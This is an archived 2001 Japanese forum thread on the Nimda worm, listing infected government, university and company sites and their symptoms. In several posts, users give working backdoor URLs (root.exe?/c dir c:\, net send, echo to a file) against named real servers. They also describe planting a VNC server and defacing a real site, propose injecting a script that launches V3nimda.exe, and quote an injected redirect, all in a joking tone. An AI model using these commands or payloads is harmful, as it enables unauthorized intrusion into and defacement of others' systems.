1read 100read
2012年3月セキュリティ160: ニムダ被害報告スレ (269) TOP カテ一覧 スレ一覧 2ch元 削除依頼
【鑑定目的禁止】検出可否報告スレ14 (284)
セキュリティ板にもIDや地域表示を導入しよう (189)
ここの銀行のセキュリティって甘そう (967)
シマンテック サポート専用スレ (202)
ESET NOD32アンチウィルス Part66 (338)
セキュリティ初心者質問スレッドpart129 (294)

ニムダ被害報告スレ


1 :01/09/21
どこがやられてる?
症状はどんな感じ?
挙げてこう。
(9/19)農水省にもウイルス侵入
(9/19)5国立大でウイルス感染
(9/19)三重県庁もウイルスに感染
(9/19)岐阜県でもウイルス感染
(9/19)宮城県庁もウイルス感染
(9/19)茨城県庁もウイルスに汚染

2 :01/09/21
http://it.nikkei.co.jp/it/sp9/sp9Ch.cfm?id=20010920eimi067020
韓国の情報通信省は20日、
米連邦捜査局(FBI)が米中枢同時テロとの関連を調べている
新種のコンピューターウイルス「W32/Nimda」について
約3700件の被害報告があったことを明らかにした。
同省は「コードレッドなどに比べて感染力が強く、急速に広がっている」
と注意を呼びかけている。
〔ソウル20日共同〕
韓国でも被害あり!!

3 :01/09/21
群馬県庁43台

4 :01/09/21
    ΛΛ    / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
 、_ ミ,,゚Д゚彡 < 正直、俺のPC。
  uuuu´     \ _____________________________________________

5 :01/09/21
内閣府によると、内閣官房と内閣府のLAN(構内情報通信網)の
一部サーバーと端末が19日午後、コンピューターウイルス「W32/Nimda(ニムダ)」に感染した。
この影響で汚染されたコンピューター端末が使えなくなったほか、
感染防止のため、内閣官房、内閣府から他のホームページを開かないよう指示した。

6 :01/09/21
某県庁確か24台。
漏れ、会社PC無傷。
漏れ、淋しいから感染サイトでニムダ落す。色々眺めて遊ぶ。
そしたら、キャッシュした感染サイトのhtmlソース自体がウイルス反応。
苦笑い。

7 :01/09/21
うちの大学・・・・

8 :01/09/21
       ____
     ,: 三ニ三ミミ;、-、     \/   ̄   | --十 i   、.__/__ \  ,   ____|__l l ー十
     xX''     `YY"゙ミ、    ∠=ー  ̄ヽ |  __|.  |   | /  ヽ  /   __|   ,二i ̄
    彡"     ..______.  ミ.    (___   ノ. | (__i゙'' し      ノ /^ヽ_ノ (__ (__
    :::::             ::;
   ,=ミ______=三ミ ji,=三ミi
   i 、'ーーー|,-・ー |=|,ー・- |                ,-v-、
   i; '::  ::: ーー" ゙i ,ーー'j             / _ノ_ノ:^)
    ーi:: ::i:  /`^ー゙`、_ ..i           / _ノ_ノ_ノ /)
     |:::. ゙"i _,,.-==-、;゙゙i             / ノ ノノ//
     〉::.:..  丶 " ゙̄ .'.ノ       ____  /  ______ ノ
   / i, `ー-、.,____,___ノ\____("  `ー" 、    ノ
 ー'/  'i. ヽ、 ,二ニ/   \       ``ー-、   ゙   ノ
  /   'i、 /\ /      >       ( `ー''"ー'"
  \   'i," (__) /   /         \ /ノ

9 :01/09/21
どこのスレか忘れたけど
18日にリアルタイムでmsnが変だって言ってる時に
普通に見に行ったらられれたーよ。

10 :01/09/22
おそらく、F社第○システム事業部および関連部署
20日出荷予定のパッケージシステム差分が出荷されず。
担当者曰く「ウィルスのせい」だそうです。

11 :01/09/22
某大手家電メーカー全社的にやられちゃいました〜。

12 :01/09/23
Q電

13 :01/09/23
岡山県庁

14 :01/09/23
>>9
ウイルスに感染してもHPは正常に見れるよ。

15 :01/09/23
高松市保健所感染

16 :01/09/23
掲示板付き感染サイトハケーン 大物居なくなった・・・
http://www.rsk2000.co.jp

17 :01/09/23
東京トヨペット閉鎖中
http://www.tokyo-toyopet.co.jp/comtop/index.html

18 :01/09/23
症状は?

19 :01/09/23
Apache鯖なのに置いてあるってことは便乗犯?
http://www1.sphere.ne.jp/noone/

20 :01/09/23
ダウ平均で有名なここもウィルスばら撒き中。
http://www.djnews.co.jp/
どうでもいいけど早く閉鎖しろよな(藁

21 :01/09/23
この企業は社会的責任も大きいのでこのまま放置は日本の恥
よって晒し上げ
苦情はこちら↓
Sites with longest running systems at Dow Jones Japan K.K.
Dow Jones Japan K.K. Marunouchi Mitsui Bldg. 1F, 2-2-2 Marunouchi, Chiyoda-ku, Tokyo 100-0005, Japan
ダウ・ジョーンズ・ジャパン(株)
住所 東京都千代田区丸の内2−2−2
電話(代表)03-5220-2730

22 :01/09/23
>>19
感染するとローカルマシンのhtmlファイルも改竄される模様。
どっかのページで地雷踏んで、それに気づかないままの可能性
あり。

23 :01/09/23
>>22
ってことは改竄されたhtmlを転送したってこと?
にしても転送後に普通確認するよなぁ。
readme.exeも一緒に転送とか、故意以外に考え難いんだが
そんなことあるの?

24 :01/09/23
>>16 は間違い 訂正はこっち
BBS付き感染サイト
http://www.rsk2000.co.jp/ipg/

25 :01/09/23
>>23
すま、俺もよくわかってないです
好奇心からいろいろ調べてるけど、伝染させるのに
使ってる脆弱性だけでも2,3あるし。
でも、ローカルのhtml,aspなど改竄するのは確かかと。
このへんから。
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.nimda.a@mm.html

26 :01/09/23
>>23
(ワーム自身の)コピーを行うフォルダにHTML、ASPファイルがあった
場合、HTMLファイルにJavaScriptのコマンドを一行追加すると同時に
“README.EML”のファイル名でウイルスのメールファイルを作成する
場合があります。このJavaScriptを追加されたHTML、ASPファイルが
Web上で公開されていた場合、そのページをブラウズすると
“README.EML”がオープンされ、IEのセキュリティホールにより
ウイルスが活動を開始します。

27 :01/09/23
>>24
>nimudaウィルスは、サーバーが感染したものです。
>すでに駆除済みですが、コマンドが断片的に残されており
>ニムダを自動的にインストールしようとしてエラーが起こります。
>ウィルス自体は駆除済みなので感染することもございません。
>安心して閲覧して下さい。
だそうです。確かにhtmlには残骸が残っててダウンロードさせる
動作はするがreadme.exeが無いため404になってるようだが。

28 :01/09/24
おいらのPC、190も".eml"があったよ〜。 (T_T)
でも、起動ドライブには1つも無かった。
感染してるのか?

29 :01/09/24
「ノートン入れてるからぁ」なんて余裕だったんだけど、甘かった。
セキュリティのログ見て、ここんとこずっと一分おきくらいに一日中
アタックされてるからなんかむかついて1個アドレスコピーしてIPサーチ
のHPでそのアドレスに繋いだとたん、画面にでっかく「FUCK’IN USA GAMEMT」
とか出てアンチウィルスの警告・・・処理画面の「次へ」のボタン押しつづけても新たな
警告のダイアログが・・・結局除去不可でウィルス隔離された後、手動でウィルス定義
更新して、完全スキャンして(ウィルスは発見されませんでした)その後メニュー画面で検疫
ログ見たら3つファイルがあったので削除。やっぱemlとかreadmeとなってた。
 これでOKですよね?

30 :01/09/24
キャッシュで止まってたの?
つうか感染サイト行く時にはJavaのアクティブスクリプト
切りましょう。

31 :01/09/24
SOYOで食らった。Nimda感染が判明したからか、今は一部ページが削除されてるようだが。
http://www.soyo.co.jp/

32 :01/09/24
>>30
>Javaのアクティブスクリプト
って何?

33 :01/09/24
>>30
そういうボケ、おれ好きよ☆

34 :01/09/24
ttp://www.advaoptical.co.jp
アドバ・オプティカル・ネットワーキング株式会社
  CodeRedにもやられたままだし。。。
  注意しようにもDNSでMXが設定されてないし。。。。
社名にネットワーキングとはいってるが、何の会社だ。。。

35 :01/09/24
マクで感染サイト開くと、 タイトルバーに
http://www.xxx.xx.xx/readme.eml
って書いてあるでかいウィンドゥが開くんだよ。

36 :01/09/24
拙者の自宅PCたちは無事だったが、会社のネットワーク全滅。
1度駆除したが、再度罹患して全滅。
おととい駆除を終えたばかり。
今後2度と罹患しないでくれ〜。
なぜか拙者が容疑者だ。

37 :01/09/24
>>34
光通信デバイスの商社です。

38 :01/09/24
>>37
ネットワーキングといっても
コンピュータネットワークとはあまり関係ないんだね。
(関係あったらちょっとヤだったけど)
連休中だから会社に人がいなくて気づいてないのかな。。

39 :01/09/24
しかし、このアドバ DNSからMXがひろえないというのは
何だろう。
メールはやらないということか。

40 :01/09/24
nullって窓が開いたぞ〜
なんだこりゃぁぁぁあぁぁああああああああああああああああああああああああ

41 :01/09/24
>>40
ご愁傷様です(藁

42 :01/09/24
感染するとどうなるわけ?

43 :01/09/24
>>42
バックドアの作成、admin.dll/riched20.dllの上書き、htmlファイルの改竄、
すべてのドライブのネットワーク共有の作成、開いているネットワーク共有フォルダへ
自分自身をコピー、ゲストアカウントの管理者権限への昇格、自前のSMTPエンジンを
使って自分自身を大量送信、実行形式ファイルの改竄
などなど。

44 :01/09/25
連休で放置されたままのサイト多いと思われ。
その上CodeRedのroot.exe残ったままって結構あるな。

45 :01/09/25
どこの国立大学が感染したの?

46 :01/09/25
あどば、月曜になってもそのまま
http://www.advaoptical.co.jp/scripts/root.exe?/c%20dir%20c:\
社名からネットワーキングはずした方がよくないか?

47 :01/09/25
二重に引っかかってます
ttp://www.bee.woodland.co.jp/test/kb-index.htm

48 :01/09/25
ウッドランドさんまで。。。

49 :01/09/26
気を取り直して。
ここ↓は、やられてるのでしょうか?
ttp://www5.yodobashi.co.jp/jsp/dc.jsp?sst_id=0000000002

50 :01/09/26
これだけ感染被害が出やすくて、次のXPでも問題点が解消されてなければ集団もんじゃない?
絶対、PL法違反だよ。分かってるバグを残して出荷してるんだから。
みんなで声を高らかに上げよう!
マイクロソフトはXPを無償で配ばれ!!

51 :01/09/26

>マイクロソフトはXPを無償で配ばれ!!
穴だらけのものがこれ以上広がったらよけいマズイぞ!!

52 :01/09/26
XPって穴あるの? もうわかってるの?

53 :01/09/26
NTや200の穴具合からみて
あると憶測してもいいと思われ。

54 :01/09/26
>53
というか、たとえ無くても、以後1年間は穴空けられまくると推測する方が
前向きで宜しいと思われ。
先ずは、リモートデスクトップ。
外からアクセスに強くても内側から起動させられて利用されればどうしよう
もないと思われ。

55 :01/09/26
XP対応の新種ワーム誕生
 ↓
トラフィクが急激に増大
 ↓
各プロバイダのバックボーン増強
 ↓
(゚д゚)ウマー
 ↓
     ,一-、
    / ̄ l |   / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
   ■■-っ < んなーこたーない
   ´∀`/    \________
  __/|Y/\.
Ё|__ | /  |
   | У..  |

56 :01/09/28
もういっぺんニムダ捕獲しようとしてうろうろ
してるけど、なかなか捕まらないYO!
しかし、感染したことを隠す組織のなんと多いことか....
readme.emlへのアクセスだけを取り払っているので
バレバレだってばよ。
<language=JavaScript></JavaScript>
みたいな感じでばっちり残ってるんだけど....

57 :01/09/28
>>56
port80のログをチェックして、nimdaからのアクセスがあれば
そこのroot.exeを覗きに行く、というのではどうかな。
数日前だけど、それでいくつか入手したよ。

58 :01/09/28
>>56
いくらでもどうぞ。
ttp://www.sano-mfg.co.jp/tokucyo/tokuchou.htm
ttp://www.bee.woodland.co.jp
ttp://www.clubtgp.com/freehosting/teeny/kat/index.htm

59 :01/09/28
>>56
redme.eml拾ってどうするの?
base64エンコードの部分だけxxxしてxxxxとxxxてxxxxなよ(w

60 :01/09/28
>>57
そういえば、その方法使えたな....
どもです
>>58
ありがと、後で見に行ってみるよ。
>>59> redme.eml拾ってどうするの?
いや、ただ単に漏れが興味あるから見たくなっただけ。
ほら、それにこれだけ大騒ぎになってるのにほったらかしに
してある鯖ってちょっと見てみたくない?(w

61 :01/09/28
>>60
>ほら、それにこれだけ大騒ぎになってるのにほったらかしに
>してある鯖ってちょっと見てみたくない?(w
つーか、ほったらかしのサイトってまえにあった
ttp://IP/script/root.exe?/c%20net%20send%20localhost%20%22ほげほげ%22
でメッセージ送ろうがお構いなしだよ。
そいやたまたまログに残ってたのを見にいったら、CodeRed.txtって
いうファイルを作ってる先客がいた。それでも気が付かないみたい。
ttp://IP/scripts/root.exe?/c%20echo%20Your Machine is infected by CodeRed.>c:\>CodeRed.txt
モニタ切ってるのかな?いいかげん飽きてきた。

62 :01/09/28
>>61
ムダムダ。シャットダウンに成功したって翌日そのまま再起動してた例があるくらいだから。

63 :01/09/28
だから「2無駄」って言うのかぁ

64 :01/09/28
>>61
そういえば、
あるサイトで見たんだが、
2001-09-20 04:03p 667,648 V3nimda.exe
このV3てなんだ?

65 :01/09/28
だいたい、
http://IP/
で閉店してるのに
root.exe
が通るようなサイトは永久にこのままだな(w

66 :01/09/28
>>64
実行したら http://IP/
ページを表示できません
だったのが、
ページが見つかりません
になっちゃったよ(w

67 :01/09/29
>>64
V3はCodeRedIIのことかな?
ま、一応は対策しようとしてる姿勢はあるようだな。
バックドアには無頓着のようだが(w
>>61
再起動されたらしつこくシャットダウン(w
つか、2000でコマンドからシャットダウンってのは難しそう。
http://homepage2.nifty.com/winfaq/w2k/boot.html#1001
それもコマンドでファイル作って実行したのかな?

68 :01/09/29
>>67
おらいま、VNCサーバー送り込もうとしてるだ(w

69 :01/09/29
>>68
もう、何でもやってちょぷだい。
でもイターイのイヤーン。

70 :01/09/29
>>67
つーか、こういうのがあるなら、感染マシンに取りこまさせたのでしょう。
漏れはやったわけじゃないけど。

71 :01/09/29
某会社、1週間も泊まりつづけてニムダ駆除してるんだけど
それってどう?

72 :01/09/29
>>70
んー、どこぞのftpでアップしろというのもanonymousじゃ
だめなわけだから結構難しいと思う。
感染鯖からftpでgetまでもできなさそう。
ftpまでハックしないと無理でない?

73 :01/09/29
>>71
個人ユーザーが1台のマシンにつきっきりでもしんどいし、アタマ使うのに、会社で五月雨式にやっても永久に・・・。
某社ではIE禁止令(来年3月までの時限)が出たらしいよ。

74 :01/09/29
ただ閉じてるだけのところ、日本には山ほどあるよね。
http://www.takara-univ.ac.jp/
http://www.unionsys.co.jp/
http://nac-ltd.co.jp/
http://www.htsc.ap.titech.ac.jp
http://www.sg-jc.ac.jp/
http://www.advaoptical.co.jp/
http://www.computools.co.jp/
http://www.sano-mfg.co.jp
http://www1.fl.kansai-u.ac.jp/
http://www.inet-service.co.jp/
このへんが復活したらどうなるんだろう。 嵐が収まったから玄関あけよう、みたいなところも多いような・・。
こんなとこもあるし。
http://pc2.autechs-unet.ocn.ne.jp
10月再開って、なんか目途があるんだろうか。
http://www.with9.com/

75 :01/09/29
>>72
EXPLOITツール使う。若し対象鯖未だパッチ当ててないなら使える。
外出配布済み。

76 :01/09/30
>>74
取りあえず×
http://www.inet-service.co.jp/scripts/root.exe?/c%20dir%20c:\

77 :01/09/30
人間の脳にも感染するようです。
http://cgibbs.mmjp.or.jp/bbs/show/www.zumensoft.co.jp/bbs

78 :01/09/30
>>76
>これからの企業成長の原動力はダイナミックな情報システム。
>そのキーとなるのがイントラネットシステムです。
>国境や時差の壁を越え、世界中のあらゆる分野に浸透しつつあるインターネットを
>企業内のクライアント・サーバーシステムと融合させることにより
バックドアにより見事にイントラネットとインターネットが融合
しました(w

79 :01/10/01
報告!
http://www.zumensoft.co.jp/menu.html

80 :01/10/01
>>77
>>79
同じやん( ̄△ ̄;

81 :01/10/01
>私たちは、企業の社内外に存在する「情報」を、戦略的な資源として活用するするための「仕組み作り」を、お客様と共に「リアライズ」(実現)
>していくことを基本理念としています
バックドアによって社外から有用な情報が勝手にはいってくるわけですな。

82 :01/10/01
http://www.bee.woodland.co.jp/readme.eml
だめぢゃん( ̄△ ̄;

83 :01/10/01
http://cgibbs.mmjp.or.jp/bbs/show/www.zumensoft.co.jp/bbs
>ウィルス駆除ソフトはシマンテックNorton Antivirus2000を使っていましたが効き目がありません
ノートンだめだとよ(w

84 :01/10/02
>>83
匿名で投稿した2CHねら居たみたいだけど、IP晒されてる・・・。

85 :01/10/02
>>84
晒されるのは最初から分かっているのだから承知の上だろう。

86 :01/10/03
ニムダ感染のため、行方不明になりました。
http://www.miruku.co.jp/usr/find/higa.htm
探してあげてください。

87 :01/10/03
>>86
こ…このサイト、ひどすぎない?

88 :01/10/03
>>86
ニムダのソース弄って、尋ね人のデータと連絡先本文にしてばら撒けば
良いよ。

89 :01/10/03
http://www.miruku.co.jp/
index.htmlのソースに烈しくワラタ

90 :01/10/03
>>89
<!-- sorosoro naosouyo... meiwakudayo... -->

91 :01/10/03
90は誰が書いたのかな。。。。

92 :01/10/03
>>91
89と思われ(w

93 :01/10/03
90書いて人に
”改竄できるなら、無害化しておいてやれ”
ってのはマズイんだよな。やっぱ

94 :01/10/03
90書いてる人に
”改竄できるなら、index.htmlにも
<html><script language="JavaScript">window.open("V3nimda.exe",null, "resizable=no,top=6000,left=6000")</script></html>
を挿入しておいてやれ”
ってのもマズイんだよな。やっぱ

95 :01/10/03
>>89
もっとひどいことになってるぞおい

96 :01/10/03
>>95=89
だからやめなはれって(w

97 :01/10/03
遊んだら戻して置いてね。
---
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>
<META name="GENERATOR" content="IBM WebSphere Homepage Builder V6.0.2 for Windows">
<META http-equiv="Content-Type" content="text/html; charset=Shift_JIS">
<META http-equiv="Content-Style-Type" content="text/css">
<TITLE>沖縄情報</TITLE>
</HEAD>
<FRAMESET rows="143,*" frameborder="NO">
<FRAME src="index_u.html" scrolling="AUTO">
<FRAMESET cols="125,*" frameborder="NO">
<FRAME src="index_l.html" scrolling="AUTO">
<FRAME src="index_d.html" scrolling="AUTO">
</FRAMESET>
<NOFRAMES>
<BODY>
<P>このページをご覧いただくにはフレーム対応のブラウザが必要です。</P>
</BODY>
</NOFRAMES>
</FRAMESET>
</HTML>
<!-- sorosoro naosouyo... meiwakudayo... -->

98 :01/10/03
>>95
そこまでできるなら、NapかMXの鯖置いてくれ(w

99 :01/10/03
>>89
<html><meta http-equiv="refresh" content="0.1;URL=http://www.-jp.net/dh/02/"></html>
あ〜あ・・・こんなもんかね。ページクラクって(w
串さして遣ってないと不味い事にならんかね。。(w

100read 1read
1read 100read
TOP カテ一覧 スレ一覧 2ch元 削除依頼
Sunbelt Personal Firewall - Part 31 (371)
私はトレンドマイクロを信頼します (772)
i-フィルターを解除したい (797)
ウイルスキラーるろうに剣心 を妄想するスレ (476)
ウイルスバスター2005 Part45 (251)
ADSLユーザーにも 国際電話発信トラブル (263)
--log9.info------------------
【たぶん】岡村靖幸【12歳】 (395)
★☆★HARRY part11★☆★ (271)
HYDE vol.243 (823)
Laika Came Back (675)
吉井和哉part215 (1001)
【パーティー料理に】鈴木康博4【唾を吐く】 (767)
【Only Human】 K(ケイ) カンユンソン 〜vol.1 (134)
☆☆  斉藤和義  ☆☆ Vol. 51 ☆☆ (498)
LEO今井 -LEOIMAI- 2 (776)
SUGIZO Part.49 (705)
【猫騙】上杉昇を心から応援するスレ【ソロ】part.56 (577)
Pelikan 1羽目 (265)
【ポップオペラ】藤澤ノリマサ part9【テニプリ】 (624)
中西保志(笑) (556)
鈴木慎一郎〜BLOOD&CHAIN〜PART1 (170)
唄い屋 清木場俊介 65 (477)
--log55.com------------------
【荒らし】トコロテン射精Shigeru-a24対策室 第59刷
【荒らし】トコロテン射精Shigeru-a24対策室 第63刷
【荒らし】トコロテン射精Shigeru-a24対策室 第65刷
【荒らし】トコロテン射精Shigeru-a24対策室 第69刷
【荒らし】トコロテン射精Shigeru-a24対策室 第71刷
【荒らし】トコロテン射精Shigeru-a24対策室 第73刷
【荒らし】トコロテン射精Shigeru-a24対策室 第75刷
【荒らし】トコロテン射精Shigeru-a24対策室 第77刷